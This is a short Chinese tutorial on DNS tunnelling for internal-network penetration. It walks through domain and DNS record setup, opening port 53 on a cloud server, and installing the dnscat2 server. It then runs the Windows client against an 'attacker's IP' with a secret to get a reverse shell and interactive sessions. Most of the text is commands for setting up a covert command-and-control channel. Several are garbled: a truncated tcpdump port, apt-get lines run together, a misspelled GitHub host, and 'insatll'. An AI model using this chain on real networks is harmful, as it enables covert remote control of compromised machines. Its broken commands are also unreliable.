内网渗透之DNS隧道技术
01
前言
02
购买域名并配置A记录和NS记录

(注意)如果是阿里云服务器一定记得要配置下安全组策略,出口和入口配置允许53端口,不然监听不到53端口过来的流量,操作如下图所示:



03
测试是否解析到服务器
1、测试下A记录是否解析成功
ping 配置域名


在VPS服务器上进行抓包(端口53号端口UDP)
tcpdump -n -i eth0 dst port 5tcpdump:是一个运行在命令行下的抓包工具。它允许用户拦截和显示发送或收到过网络连接到该计算机的TCP/IP和其他数据包
-n :将每个监听到数据包中的域名转换成IP地址后显示,不把网络地址转换成名字

04
安装dnscat2
在VPS服务器上安装dnscat2服务端,因为服务端是用ruby语言编写的,所以需要配置ruby环境,我使用的是unbuntu服务器,所以需要安装下以下依然包和环境
apt-get install gemapt-get install ruby-devapt-get install libpq-devapt-get install ruby-bundler
apt-get insatll gitgit clone https://githun.com/iagox86/dnscat2.gitcd dnscat2/serverbundle insatll

接下来就是启动服务端了
ruby ./dnscat2.rb --dns 'domain=localhost,host=127.0.0.1,port=53' --no-cache
启动客户端
dnscat2-v0.07-client-win32.exe --dns server=攻击者的IP --secret=攻击者服务器生成的ID
成功反弹shell

客户端和服务端建立连接后服务端处于交互模式,输入session命令可以查看当前控制的进程(每个连接都是独立的进程)。输入shell命令打开另一个会话,建立一个交互模式


赞 (0)
